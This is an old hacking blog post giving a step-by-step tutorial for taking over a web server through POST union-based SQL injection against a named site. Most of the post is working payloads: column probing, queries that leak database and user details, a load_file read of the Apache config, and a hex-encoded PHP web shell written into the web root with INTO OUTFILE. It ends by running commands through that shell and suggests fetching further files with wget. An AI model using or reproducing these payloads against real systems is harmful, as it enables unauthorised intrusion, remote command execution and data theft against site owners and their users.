Sunday, 17 February 2013

After Getting a great response on my other Tutorials ;)

I decided to write a Complete Tutorial on Pwning a machine using SQL injection even without Executing system Commands.

Here is the Complete Video and you can watch the video before reading for a better understanding



well First we will start from recognizing the Injection Point.

So here we go.

http://turfrecon.com/select.php


POST Union Based SQL injection

lets try to enter 1' and see what happens.....

so now we can start injection:

1' order by 1#
No Error
1' order by 2#
Error


Getting Required INformation from the server


1' union all select group_concat(database(),0x3D,user(),0x3D,version(),0x3D,@@datadir)#


By this Query we got
Database : sqlol
username : root@
version : 5.5.24-log
datadir : c:\wamp\bin\mysql\mysql5.5.24\data\

Now lets find out the Apache version

well for that there are many ways but m going to use firefox Temperdata addon to check the request header.

so its Apache2.2.22

Now we can guess the Apache Config File Path so lets view the file using a SQL query

1' union all select load_file('c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf')#


Now search for the website Name and get the document root

DocumentRoot "c:/wamp/www/turf/"

1' union all select 0x3c3f2073797374656d28245f4745545b2763275d293b203f3e INTO OUTFILE 'c:/wamp/www/turf/gothacked.php'#


Now check http://turfrecon.com/gothacked.php?c=echo "You Got pwn3d"

now u can upload any file on the server using wget command

NOTE: I WENT THROUGHT THE FILES AS PER THE SCENARIO, WHICH MAY BE DIFFRENT IN DIFFRENT CASES SO
YOU JUST NEED TO FIND THE DEFAULT FILES PATH AS PER YOUR SCENARIO REST THE COMMANDS WILL
BE SAME.

Have Fun Thanxz for Reading

3nj0y H4ck!nG

0 comments:

Post a Comment